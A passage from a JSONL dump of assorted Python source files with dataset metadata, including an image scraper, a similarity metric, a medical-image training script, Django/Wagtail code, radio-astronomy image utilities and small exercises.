0 else 0\r\n\r\n features[\"highest_trump\"] = 1 if highest_self_trump > highest_enemy_trump else -1\r\n\r\n return features\r\n","sub_path":"git_upload/FeatureExtractors.py","file_name":"FeatureExtractors.py","file_ext":"py","file_size_in_byte":6626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"451878776","text":"start, end = 251811, 251826\r\n\r\nfor n in range( start, end+1 ):\r\n a = [] # массив для хранения делителей\r\n for d in range(1,n+1):\r\n if n % d == 0:\r\n a.append(d)\r\n if len(a) > 4: break\r\n if len(a) == 4:\r\n print( *a )\r\n","sub_path":"tasks_25/solutions/25-6.py","file_name":"25-6.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"80114203","text":"from bs4 import BeautifulSoup\nimport requests\nimport re\nimport urllib2\nimport os\nimport argparse\nimport sys\nimport json\nimport random\nimport imghdr\n\n# adapted from http://stackoverflow.com/questions/20716842/python-download-images-from-google-image-search\n\n\ndef delete_files(folder):\n for the_file in os.listdir(folder):\n file_path = os.path.join(folder, the_file)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n #elif os.path.isdir(file_path): shutil.rmtree(file_path)\n except Exception as e:\n print(e)\n\n\ndef get_soup(url,header):\n return BeautifulSoup(urllib2.urlopen(urllib2.Request(url,headers=header)),'html.parser')\n\ndef run(max_images, query):\n\twhitelist = set('abcdefghijklmnopqrstuvwxy ABCDEFGHIJKLMNOPQRSTUVWXYZ')\n\tquery = ''.join(filter(whitelist.__contains__, query))\n\tarr = query.split()\n\tquery='+'.join(arr)\n\theader={'User-Agent':\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36\"}\n\turl=\"https://www.google.co.in/search?q=\"+query+\"&source=lnms&tbm=isch\"\n\tsoup = get_soup(url,header)\n\tActualImages=[] # contains the link for Large original images, type of image\n\tfor a in soup.find_all(\"div\",{\"class\":\"rg_meta\"}):\n\t link , Type =json.loads(a.text)[\"ou\"] ,json.loads(a.text)[\"ity\"]\n\t ActualImages.append((link,Type))\n\trandom.shuffle(ActualImages)\n\t\n\ttype = ''\n\n\tfor (url, type) in ActualImages:\n\t print(url, type)\n\t if type == 'jpg' or type == 'jpeg':\n\t return url\n\n\n\nif __name__ == '__main__':\n from sys import argv\n try:\n main(argv)\n except KeyboardInterrupt:\n pass\n sys.exit()\n","sub_path":"flaskbb/scrapers/google_scraper.py","file_name":"google_scraper.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"225830367","text":"import numpy as np\nfrom embed.spectrum import spectrum_map\nfrom falkon import Falkon, kernels\nimport torch\nfrom tqdm import tqdm\n\ndef mmd(seq1=None, seq2=None, emb1=None, emb2=None, mean1=None, mean2=None, embedding='spectrum', kernel='linear', return_pvalue=False, progress=False, **kwargs):\n '''\n Calculates MMD between two sets of sequences. Optionally takes embeddings or mean embeddings of sequences if these have been precomputed for efficiency. If is true, a Monte-Carlo estimate (1000 iterations) of the p-value is returned. Note that this is compute-intensive and only implemented for the linear kernel.\n '''\n\n if embedding == 'spectrum':\n embed = spectrum_map\n if embedding == 'profet':\n raise NotImplementedError\n if embedding == 'unirep':\n raise NotImplementedError\n\n if mean1 is None and emb1 is None:\n emb1 = embed(seq1, progress=progress, **kwargs)\n if mean2 is None and emb2 is None:\n emb2 = embed(seq2, progress=progress, **kwargs)\n\n if mean1 is None:\n x = np.mean(emb1, axis=0)\n else:\n x = mean1\n if mean2 is None:\n y = np.mean(emb2, axis=0)\n else:\n y = mean2\n\n if kernel == 'linear':\n MMD = np.sqrt(np.dot(x,x) + np.dot(y,y) - 2*np.dot(x,y))\n if return_pvalue:\n m = len(emb1)\n agg = np.concatenate((emb1,emb2),axis=0)\n mmds = []\n it = tqdm(range(1000)) if progress else range(1000)\n for i in it:\n np.random.shuffle(agg)\n _emb1 = agg[:m]\n _emb2 = agg[m:]\n mmds.append(mmd(emb1=_emb1, emb2=_emb2))\n rank = float(sum([x<=MMD for x in mmds]))+1\n pval = (1000+1-rank)/(1000+1)\n return MMD, pval\n else:\n return MMD\n\n elif kernel == 'gaussian':\n gauss = kernels.GaussianKernel(sigma=1.0)\n x = torch.from_numpy(emb1)\n y = torch.from_numpy(emb2)\n m = float(len(emb1))\n n = float(len(emb2))\n Kxx = gauss(x,x).numpy()\n Kxy = gauss(x,y).numpy()\n Kyy = gauss(y,y).numpy()\n return np.sqrt(\n np.sum(Kxx) / (m**2)\n - 2 * np.sum(Kxy) / (m*n)\n + np.sum(Kyy) / (n**2)\n )\n","sub_path":"metrics/similarity.py","file_name":"similarity.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"294156656","text":"import shutil\nimport gc\nimport torch\n\nimport fastai\nfrom fastai.vision import *\nfrom fastai.widgets import *\nfrom fastai.callbacks import *\n\nprint(\"BRIGHTNESS\")\n\nConfig.DEFAULT_CONFIG = {\n 'data_path': './../data/MURA-v1.1/',\n 'model_path': './models/'\n }\n\nConfig.create('/tmp/myconfig.yml')\nConfig.DEFAULT_CONFIG_PATH = '/tmp/myconfig.yml'\n\npath = Config.data_path()\n\nfnames_train = get_image_files('../data/MURA-v1.1/train/', recurse=True)\nprint(len(fnames_train))\n\nfnames_valid = get_image_files('../data/MURA-v1.1/valid/', recurse=True)\nprint(len(fnames_valid))\n\npat_label = re.compile(r'/XR_([^/]+)/[^/]+/[^/]+/[^/]+.png$')\npat_patient = re.compile(r'/[^/]+/patient([^/]+)/[^/]+/[^/]+.png$')\npat_study = re.compile(r'/([^/]+)_[^/]+/[^/]+.png$')\n\nmura = ['elbow', 'finger', 'forearm', 'hand', 'humerus', 'shoulder', 'wrist']\n\nstudy_train_dict = dict()\nstudy_valid_dict = dict()\n\nfor m in mura:\n study_train_dict[m] = list()\n study_valid_dict[m] = list()\n \nfor src in fnames_train:\n # get image label\n label = pat_label.search(str(src))\n label = label.group(1)\n # get patient number\n patient = pat_patient.search(str(src))\n patient = patient.group(1)\n # get study name\n study = pat_study.search(str(src))\n study = study.group(1)\n # add to label list\n s = 'patient' + patient + '_' + study\n study_train_dict[label.lower()].append(s)\n\nfor src in fnames_valid:\n # get image label\n label = pat_label.search(str(src))\n label = label.group(1)\n # get patient number\n patient = pat_patient.search(str(src))\n patient = patient.group(1)\n # get study name\n study = pat_study.search(str(src))\n study = study.group(1)\n # add to label list\n s = 'patient' + patient + '_' + study\n study_valid_dict[label.lower()].append(s)\n \nnum_train_studies = 0\nnum_valid_studies = 0\n\nfor m in mura:\n # train\n myset = set(study_train_dict[m])\n num_train_studies += len(myset)\n # valid\n myset = set(study_valid_dict[m])\n num_valid_studies += len(myset)\n \nsize = 128\nbs = 64\n\nnp.random.seed(24)\ndata = ImageDataBunch.from_folder('../data/MURA-v1.1/data2/', ds_tfms=get_transforms(do_flip=False, max_warp=0.0, p_lighting=0, xtra_tfms=[brightness(change=(0.65,0.65),p=1) ]), size=size, bs=bs).normalize(imagenet_stats)\n\n\nkappa = KappaScore()\nkappa.weights = \"quadratic\"\n\nlearner = cnn_learner(data, models.densenet169, metrics=[error_rate, accuracy, kappa], wd=0.1, model_dir=\"./models/\").to_fp32()\nlearner.fit_one_cycle(10, callbacks=[ShowGraph(learner) ,SaveModelCallback(learner)])\n\nlearner.save('brightness')","sub_path":"data_augmentation/data_augmentation/brightness.py","file_name":"brightness.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"410600330","text":"import logging\n\nfrom django.core.exceptions import ValidationError\nfrom django.db import models\nfrom django.urls import reverse\nfrom wagtail.admin.edit_handlers import MultiFieldPanel, FieldPanel\nfrom wagtail.contrib.frontend_cache.utils import PurgeBatch\n\nfrom wagtail.contrib.settings.models import BaseSetting\nfrom wagtail.contrib.settings.registry import register_setting\nfrom wagtail.core.fields import RichTextField\n\n\n@register_setting\nclass SiteWideAlertSettings(BaseSetting):\n class Meta:\n verbose_name = \"Sitewide alert\"\n\n sitewide_alert_enabled = models.BooleanField(\n default=False, verbose_name=\"Enable sitewide alert\"\n )\n sitewide_alert_text = RichTextField(\n blank=True,\n features=[\"h2\", \"h3\", \"bold\", \"italic\", \"link\"],\n verbose_name=\"Alert text\",\n )\n\n background_colour = models.CharField(\n max_length=6,\n blank=True,\n help_text=\"Background RGB value. e.g. fd5765\"\n )\n text_colour = models.CharField(\n max_length=6,\n blank=True,\n help_text=\"Text colour RGB value. e.g. ffffff\"\n )\n\n panels = [\n MultiFieldPanel(\n [FieldPanel(\"sitewide_alert_enabled\"), FieldPanel(\"sitewide_alert_text\")],\n \"Sitewide alert\",\n ),\n MultiFieldPanel(\n [FieldPanel(\"background_colour\"), FieldPanel(\"text_colour\")],\n \"Style\",\n classname=\"collapsible\"\n ),\n ]\n\n def clean(self):\n if self.sitewide_alert_enabled and not self.sitewide_alert_text:\n raise ValidationError(\n {\n \"sitewide_alert_text\": ValidationError(\n \"To enable the sitewide alert, please specify the alert text.\"\n ),\n }\n )\n\n def save(self, *args, **kwargs):\n alert_url = reverse(\"sitewide_alert:sitewide_alert\")\n\n batch = PurgeBatch()\n batch.add_url(alert_url)\n batch.purge()\n logging.info(f\"Frontend cache purged for sitewide alert url ({alert_url})\")\n\n super().save(*args, **kwargs)\n","sub_path":"wagtailio/sitewide_alert/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"498140689","text":"from django.conf.urls.defaults import patterns, include, url\n\nfrom django.conf import settings\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('zimity.views',\n \n url(r'^$', 'home'),\n \n url(r'^users/$', 'user_index'),\n url(r'^users/view/(?P\\d+)/$', 'user_view'),\n url(r'^users/add/$', 'user_add'),\n url(r'^users/edit/(?P\\d+)/$', 'user_edit'),\n \n url(r'^imprint/$', 'imprint_index'),\n url(r'^imprint/view/(?P\\d+)/$', 'imprint_view'),\n url(r'^imprint/add/$', 'imprint_add'),\n url(r'^imprint/edit/(?P\\d+)/$', 'imprint_edit'),\n \n url(r'^about/$', 'about'),\n url(r'^contact/$', 'contact'),\n url(r'^dev/$', 'dev'),\n url(r'^jobs/$', 'jobs'),\n url(r'^privacy/$', 'privacy'),\n url(r'^terms/$', 'terms'),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n #url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n url(r'^admin/', include(admin.site.urls)),\n)\n\nif settings.DEBUG:\n urlpatterns += patterns('', (r'^media/(?P.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_ROOT}))","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"623392425","text":"\n\n#calss header\nclass _INSEMINATE():\n\tdef __init__(self,): \n\t\tself.name = \"INSEMINATE\"\n\t\tself.definitions = [u\"to put a male animal's sperm into a female animal, either by the sexual act or by an artificial method\"]\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_inseminate.py","file_name":"_inseminate.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"497582352","text":"#\n\"\"\"\nFunctions that define and manipulate images. Images are just data and a World Coordinate System.\n\"\"\"\nimport copy\nimport logging\nimport warnings\nfrom astropy.wcs import FITSFixedWarning\nwarnings.simplefilter('ignore', FITSFixedWarning)\n\nimport numpy\n\nimport astropy.units as u\nfrom astropy.coordinates import SkyCoord\n\nfrom astropy.wcs import WCS\n\nfrom data_models.polarisation import PolarisationFrame\nfrom data_models.memory_data_models import Image\n\nfrom processing_library.fourier_transforms.convolutional_gridding import w_beam\nfrom processing_library.fourier_transforms.fft_support import ifft, fft\n\nlog = logging.getLogger(__name__)\n\n\ndef image_sizeof(im: Image):\n \"\"\" Return size in GB\n \"\"\"\n return im.size()\n\n\ndef create_image(npixel=512, cellsize=0.000015, polarisation_frame=PolarisationFrame(\"stokesI\"),\n frequency=numpy.array([1e8]), channel_bandwidth=numpy.array([1e6]),\n phasecentre=None, nchan=None) -> Image:\n \"\"\"Create an empty template image consistent with the inputs.\n\n :param npixel: Number of pixels\n :param polarisation_frame: Polarisation frame (default PolarisationFrame(\"stokesI\"))\n :param cellsize: cellsize in radians\n :param frequency:\n :param channel_bandwidth: Channel width (Hz)\n :param phasecentre: phasecentre (SkyCoord)\n :return: Image\n\n \"\"\"\n \n if phasecentre is None:\n phasecentre = SkyCoord(ra=+15.0 * u.deg, dec=-35.0 * u.deg, frame='icrs', equinox='J2000')\n \n if polarisation_frame is None:\n polarisation_frame = PolarisationFrame(\"stokesI\")\n \n npol = polarisation_frame.npol\n if nchan is None:\n nchan = len(frequency)\n \n shape = [nchan, npol, npixel, npixel]\n w = WCS(naxis=4)\n # The negation in the longitude is needed by definition of RA, DEC\n w.wcs.cdelt = [-cellsize * 180.0 / numpy.pi, cellsize * 180.0 / numpy.pi, 1.0, channel_bandwidth[0]]\n w.wcs.crpix = [npixel // 2 + 1, npixel // 2 + 1, 1.0, 1.0]\n w.wcs.ctype = [\"RA---SIN\", \"DEC--SIN\", 'STOKES', 'FREQ']\n w.wcs.crval = [phasecentre.ra.deg, phasecentre.dec.deg, 1.0, frequency[0]]\n w.naxis = 4\n w.wcs.radesys = 'ICRS'\n w.wcs.equinox = 2000.0\n \n return create_image_from_array(numpy.zeros(shape), w, polarisation_frame=polarisation_frame)\n\n\ndef create_image_from_array(data: numpy.array, wcs: WCS, polarisation_frame: PolarisationFrame) -> Image:\n \"\"\" Create an image from an array and optional wcs\n \n The output image preserves a reference to the input array.\n\n :param data: Numpy.array\n :param wcs: World coordinate system\n :param polarisation_frame: Polarisation Frame\n :return: Image\n \n \"\"\"\n fim = Image()\n fim.polarisation_frame = polarisation_frame\n \n fim.data = data\n if wcs is None:\n fim.wcs = None\n else:\n fim.wcs = wcs.deepcopy()\n \n if image_sizeof(fim) >= 1.0:\n log.debug(\"create_image_from_array: created %s image of shape %s, size %.3f (GB)\" %\n (fim.data.dtype, str(fim.shape), image_sizeof(fim)))\n \n assert isinstance(fim, Image), \"Type is %s\" % type(fim)\n return fim\n\n\ndef polarisation_frame_from_wcs(wcs, shape) -> PolarisationFrame:\n \"\"\"Convert wcs to polarisation_frame\n\n See FITS definition in Table 29 of https://fits.gsfc.nasa.gov/standard40/fits_standard40draft1.pdf\n or subsequent revision\n\n 1 I Standard Stokes unpolarized\n 2 Q Standard Stokes linear\n 3 U Standard Stokes linear\n 4 V Standard Stokes circular\n −1 RR Right-right circular\n −2 LL Left-left circular\n −3 RL Right-left cross-circular\n −4 LR Left-right cross-circular\n −5 XX X parallel linear\n −6 YY Y parallel linear\n −7 XY XY cross linear\n −8 YX YX cross linear\n\n stokesI [1]\n stokesIQUV [1,2,3,4]\n circular [-1,-2,-3,-4]\n linear [-5,-6,-7,-8]\n\n \"\"\"\n # The third axis should be stokes:\n \n polarisation_frame = None\n \n if len(shape) == 2:\n polarisation_frame = PolarisationFrame(\"stokesI\")\n else:\n npol = shape[1]\n pol = wcs.sub(['stokes']).wcs_pix2world(range(npol), 0)[0]\n pol = numpy.array(pol, dtype='int')\n for key in PolarisationFrame.fits_codes.keys():\n keypol = numpy.array(PolarisationFrame.fits_codes[key])\n if numpy.array_equal(pol, keypol):\n polarisation_frame = PolarisationFrame(key)\n return polarisation_frame\n if polarisation_frame is None:\n raise ValueError(\"Cannot determine polarisation code\")\n \n assert isinstance(polarisation_frame, PolarisationFrame)\n return polarisation_frame\n\n\ndef checkwcs(wcs1, wcs2):\n \"\"\" Check for compatbility of wcs\n \n :param wcs1:\n :param wcs2:\n \"\"\"\n pass\n # No confidence in this next test\n # assert wcs1.wcs.compare(wcs2.wcs, cmp=1 | 2 | 4), \"WCS's do not agree\"\n\n\ndef convert_image_to_kernel(im: Image, oversampling, kernelwidth):\n \"\"\" Convert an image to a griddata kernel\n \n :param im: Image to be converted\n :param oversampling: Oversampling of Image spatially\n :param kernelwidth: Kernel width to be extracted\n :return: numpy.ndarray[nchan, npol, oversampling, oversampling, kernelwidth, kernelwidth]\n \"\"\"\n naxis = len(im.shape)\n assert naxis == 4\n \n assert numpy.max(numpy.abs(im.data)) > 0.0, \"Image is empty\"\n \n nchan, npol, ny, nx = im.shape\n assert nx % oversampling == 0, \"Oversampling must be even\"\n assert ny % oversampling == 0, \"Oversampling must be even\"\n \n assert kernelwidth < nx and kernelwidth < ny, \"Specified kernel width %d too large\"\n \n assert im.wcs.wcs.ctype[0] == 'UU', 'Axis type %s inappropriate for construction of kernel' % im.wcs.wcs.ctype[0]\n assert im.wcs.wcs.ctype[1] == 'VV', 'Axis type %s inappropriate for construction of kernel' % im.wcs.wcs.ctype[1]\n newwcs = WCS(naxis=naxis + 2)\n for axis in range(2):\n newwcs.wcs.ctype[axis] = im.wcs.wcs.ctype[axis]\n newwcs.wcs.crpix[axis] = kernelwidth // 2\n newwcs.wcs.crval[axis] = 0.0\n newwcs.wcs.cdelt[axis] = im.wcs.wcs.cdelt[axis] * oversampling\n \n newwcs.wcs.ctype[axis + 2] = im.wcs.wcs.ctype[axis]\n newwcs.wcs.crpix[axis + 2] = oversampling // 2\n newwcs.wcs.crval[axis + 2] = 0.0\n newwcs.wcs.cdelt[axis + 2] = im.wcs.wcs.cdelt[axis]\n \n # Now do Stokes and Frequency\n newwcs.wcs.ctype[axis + 4] = im.wcs.wcs.ctype[axis + 2]\n newwcs.wcs.crpix[axis + 4] = im.wcs.wcs.crpix[axis + 2]\n newwcs.wcs.crval[axis + 4] = im.wcs.wcs.crval[axis + 2]\n newwcs.wcs.cdelt[axis + 4] = im.wcs.wcs.cdelt[axis + 2]\n \n newdata_shape = [nchan, npol, oversampling, oversampling, kernelwidth, kernelwidth]\n\n newdata = numpy.zeros(newdata_shape, dtype=im.data.dtype)\n \n assert oversampling * kernelwidth < ny\n assert oversampling * kernelwidth < nx\n \n ystart = ny // 2 - oversampling * kernelwidth // 2\n xstart = nx // 2 - oversampling * kernelwidth // 2\n yend = ny // 2 + oversampling * kernelwidth // 2\n xend = nx // 2 + oversampling * kernelwidth // 2\n for chan in range(nchan):\n for pol in range(npol):\n for y in range(oversampling):\n slicey = slice(yend + y, ystart + y, -oversampling)\n for x in range(oversampling):\n slicex = slice(xend + x, xstart + x, -oversampling)\n newdata[chan, pol, y, x, ...] = im.data[chan, pol, slicey, slicex]\n \n return create_image_from_array(newdata, newwcs, polarisation_frame=im.polarisation_frame)\n\n\ndef copy_image(im: Image):\n \"\"\" Create an image from an array\n \n Performs deepcopy of data_models, breaking reference semantics\n\n :param im:\n :return: Image\n \n \"\"\"\n \n if im is None:\n return im\n \n assert isinstance(im, Image), im\n fim = Image()\n fim.polarisation_frame = im.polarisation_frame\n fim.data = copy.deepcopy(im.data)\n if im.wcs is None:\n fim.wcs = None\n else:\n fim.wcs = copy.deepcopy(im.wcs)\n if image_sizeof(fim) >= 1.0:\n log.debug(\"copy_image: copied %s image of shape %s, size %.3f (GB)\" %\n (fim.data.dtype, str(fim.shape), image_sizeof(fim)))\n assert type(fim) == Image\n return fim\n\n\ndef create_empty_image_like(im: Image) -> Image:\n \"\"\" Create an empty image like another in shape and wcs\n\n :param im:\n :return: Image\n \n \"\"\"\n assert isinstance(im, Image), im\n fim = Image()\n fim.polarisation_frame = im.polarisation_frame\n fim.data = numpy.zeros_like(im.data)\n if im.wcs is None:\n fim.wcs = None\n else:\n fim.wcs = copy.deepcopy(im.wcs)\n if image_sizeof(im) >= 1.0:\n log.debug(\"create_empty_image_like: created %s image of shape %s, size %.3f (GB)\" %\n (fim.data.dtype, str(fim.shape), image_sizeof(fim)))\n assert isinstance(fim, Image), \"Type is %s\" % type(fim)\n return fim\n\n\ndef fft_image(im, template_image=None):\n \"\"\" FFT an image, transform WCS as well\n \n Prefer to use axes 'UU---SIN' and 'VV---SIN' but astropy will not accept.\n \n :param im:\n :param template_image:\n :return:\n \"\"\"\n assert len(im.shape) == 4\n d2r = numpy.pi / 180.0\n ft_wcs = copy.deepcopy(im.wcs)\n ft_shape = im.shape\n if im.wcs.wcs.ctype[0] == 'RA---SIN' and im.wcs.wcs.ctype[1] == 'DEC--SIN':\n ft_wcs.wcs.axis_types[0] = 0\n ft_wcs.wcs.axis_types[1] = 0\n ft_wcs.wcs.crval[0] = 0.0\n ft_wcs.wcs.crval[1] = 0.0\n ft_wcs.wcs.crpix[0] = ft_shape[3] // 2 + 1\n ft_wcs.wcs.crpix[1] = ft_shape[2] // 2 + 1\n ft_wcs.wcs.ctype[0] = 'UU'\n ft_wcs.wcs.ctype[1] = 'VV'\n ft_wcs.wcs.cdelt[0] = 1.0 / (ft_shape[3] * d2r * im.wcs.wcs.cdelt[0])\n ft_wcs.wcs.cdelt[1] = 1.0 / (ft_shape[2] * d2r * im.wcs.wcs.cdelt[1])\n ft_data = ifft(im.data.astype('complex'))\n return create_image_from_array(ft_data, wcs=ft_wcs, polarisation_frame=im.polarisation_frame)\n elif im.wcs.wcs.ctype[0] == 'UU' and im.wcs.wcs.ctype[1] == 'VV':\n ft_wcs.wcs.crval[0] = template_image.wcs.wcs.crval[0]\n ft_wcs.wcs.crval[1] = template_image.wcs.wcs.crval[1]\n ft_wcs.wcs.crpix[0] = template_image.wcs.wcs.crpix[0]\n ft_wcs.wcs.crpix[0] = template_image.wcs.wcs.crpix[1]\n ft_wcs.wcs.ctype[0] = template_image.wcs.wcs.ctype[0]\n ft_wcs.wcs.ctype[1] = template_image.wcs.wcs.ctype[1]\n ft_wcs.wcs.cdelt[0] = template_image.wcs.wcs.cdelt[0]\n ft_wcs.wcs.cdelt[1] = template_image.wcs.wcs.cdelt[1]\n ft_data = fft(im.data.astype('complex'))\n return create_image_from_array(ft_data, wcs=ft_wcs, polarisation_frame=im.polarisation_frame)\n elif im.wcs.wcs.ctype[0] == 'XX' and im.wcs.wcs.ctype[1] == 'YY':\n ft_wcs.wcs.axis_types[0] = 0\n ft_wcs.wcs.axis_types[1] = 0\n ft_wcs.wcs.crval[0] = 0.0\n ft_wcs.wcs.crval[1] = 0.0\n ft_wcs.wcs.crpix[0] = ft_shape[3] // 2 + 1\n ft_wcs.wcs.crpix[1] = ft_shape[2] // 2 + 1\n ft_wcs.wcs.ctype[0] = 'KX'\n ft_wcs.wcs.ctype[1] = 'KY'\n ft_wcs.wcs.cdelt[0] = 1.0 / (ft_shape[3] * im.wcs.wcs.cdelt[0])\n ft_wcs.wcs.cdelt[1] = 1.0 / (ft_shape[2] * im.wcs.wcs.cdelt[1])\n ft_data = ifft(im.data.astype('complex'))\n return create_image_from_array(ft_data, wcs=ft_wcs, polarisation_frame=im.polarisation_frame)\n elif im.wcs.wcs.ctype[0] == 'KX' and im.wcs.wcs.ctype[1] == 'KY':\n ft_wcs.wcs.crval[0] = template_image.wcs.wcs.crval[0]\n ft_wcs.wcs.crval[1] = template_image.wcs.wcs.crval[1]\n ft_wcs.wcs.crpix[0] = template_image.wcs.wcs.crpix[0]\n ft_wcs.wcs.crpix[0] = template_image.wcs.wcs.crpix[1]\n ft_wcs.wcs.ctype[0] = template_image.wcs.wcs.ctype[0]\n ft_wcs.wcs.ctype[1] = template_image.wcs.wcs.ctype[1]\n ft_wcs.wcs.cdelt[0] = template_image.wcs.wcs.cdelt[0]\n ft_wcs.wcs.cdelt[1] = template_image.wcs.wcs.cdelt[1]\n ft_data = fft(im.data.astype('complex'))\n return create_image_from_array(ft_data, wcs=ft_wcs, polarisation_frame=im.polarisation_frame)\n\n else:\n raise NotImplementedError(\"Cannot FFT specified axes\")\n\n\ndef pad_image(im: Image, shape):\n \"\"\"Pad an image to desired shape\n \n The wcs crpix is adjusted appropriately\n \n :param im:\n :param shape:\n :return:\n \"\"\"\n if im.shape == shape:\n return im\n else:\n newwcs = copy.deepcopy(im.wcs)\n newwcs.wcs.crpix[0] = im.wcs.wcs.crpix[0] + shape[3] // 2 - im.shape[3] // 2\n newwcs.wcs.crpix[1] = im.wcs.wcs.crpix[1] + shape[2] // 2 - im.shape[2] // 2\n \n for axis, _ in enumerate(im.shape):\n if shape[axis] < im.shape[axis]:\n raise ValueError(\"Padded shape %s is smaller than input shape %s\" % (shape, im.shape))\n \n newdata = numpy.zeros(shape, dtype=im.data.dtype)\n ystart = shape[2] // 2 - im.shape[2] // 2\n yend = ystart + im.shape[2]\n xstart = shape[3] // 2 - im.shape[3] // 2\n xend = xstart + im.shape[3]\n newdata[..., ystart:yend, xstart:xend] = im.data[...]\n return create_image_from_array(newdata, newwcs, polarisation_frame=im.polarisation_frame)\n\n\ndef create_w_term_like(im: Image, w, phasecentre=None, remove_shift=False, dopol=False) -> Image:\n \"\"\"Create an image with a w term phase term in it:\n \n .. math::\n\n I(l,m) = e^{-2 \\\\pi j (w(\\\\sqrt{1-l^2-m^2}-1)}\n\n \n The vis phasecentre is used as the delay centre for the w term (i.e. where n==0)\n\n :param phasecentre:\n :param im: template image\n :param w: w value to evaluate (default is median abs)\n :param remove_shift:\n :param dopol: Do screen in polarisation?\n :return: Image\n \"\"\"\n \n fim_shape = list(im.shape)\n if not dopol:\n fim_shape[1] = 1\n \n fim_array = numpy.zeros(fim_shape, dtype='complex')\n fim = create_image_from_array(fim_array, wcs=im.wcs, polarisation_frame=im.polarisation_frame)\n \n cellsize = abs(fim.wcs.wcs.cdelt[0]) * numpy.pi / 180.0\n nchan, npol, _, npixel = fim_shape\n if phasecentre is SkyCoord:\n wcentre = phasecentre.to_pixel(im.wcs, origin=0)\n else:\n wcentre = [im.wcs.wcs.crpix[0] - 1.0, im.wcs.wcs.crpix[1] - 1.0]\n \n for chan in range(nchan):\n for pol in range(npol):\n fim.data[chan, pol, ...] = w_beam(npixel, npixel * cellsize, w=w, cx=wcentre[0],\n cy=wcentre[1], remove_shift=remove_shift)\n fov = npixel * cellsize\n fresnel = numpy.abs(w) * (0.5 * fov) ** 2\n log.debug('create_w_term_image: For w = %.1f, field of view = %.6f, Fresnel number = %.2f' % (w, fov, fresnel))\n \n return fim\n","sub_path":"processing_library/image/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":14835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"532169322","text":"import os\nimport psutil\nimport time\nimport json\nfrom common.send_mail import Send_Mail\n\nf=open(\"/data/pid/pid.txt\",\"r\")\ntoday={}\nline = f.read()\nline_dict = json.loads(line)\ntoday.update(line_dict)\nf.close()\n\nwhile True:\n pids=psutil.pids()\n if int(today[\"main.py\"]) in pids:\n time.sleep(10*60)\n else:\n Send_Mail().send_error_mail()\n break\n","sub_path":"check_if_run.py","file_name":"check_if_run.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"572702230","text":"import icon as icon\nimport matplotlib.pyplot as plt\n\nrkind = 'property'\nsim = icon.sim(25,250,0.9,-1,rkind)\nfig, (ax,bx) = plt.subplots(nrows=1, ncols=2)\nfig.set_facecolor(\"#ffffff\")\n\nax.set_title(\"Homogeneous\")\nax.set_xlabel(\"Revenues\")\nax.hist(icon.revenues(sim['ho']['firms'],rkind))\nbx.set_title(\"Heterogeneous\")\nbx.set_xlabel(\"Revenues\")\nbx.hist(icon.revenues(sim['he']['firms'],rkind))\n\n\nplt.show()","sub_path":"draw_hist_sim.py","file_name":"draw_hist_sim.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"641462491","text":"class Solution(object):\n def myAtoi(self, str):\n \"\"\"\n :type str: str\n :rtype: int\n \"\"\"\n INT_MAX = 2147483647\n INT_MIN = -2147483648\n if not str: return 0\n ans = 0\n sign = 1\n for i in range(len(str)):\n if str[i] != ' ': break\n str = str[i:]\n if not str: return 0\n if str[0] == '-':\n sign = -1\n str = str[1:]\n elif str[0] == '+': str = str[1:]\n for i in range(len(str)):\n if '0' <= str[i] <= '9': \n ans = ans*10 + int(str[i])\n else: break\n ans = ans*sign\n if ans > INT_MAX: return INT_MAX\n if ans < INT_MIN: return INT_MIN\n return ans\n\nif __name__ == '__main__':\n sol = Solution()\n print(sol.myAtoi('-1'))\n","sub_path":"Algorithms/8 String to Integer (atoi)/String to Integer (atoi).py","file_name":"String to Integer (atoi).py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"311318619","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n#\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n#\n\nimport time\nimport os\nimport sys\nimport configparser\nimport codecs\nfrom functools import cmp_to_key\nfrom typing import Any\nfrom typing import BinaryIO\nfrom typing import Dict\nfrom typing import List\nfrom typing import Optional\nfrom typing import TextIO\nfrom typing import Tuple\nfrom typing import 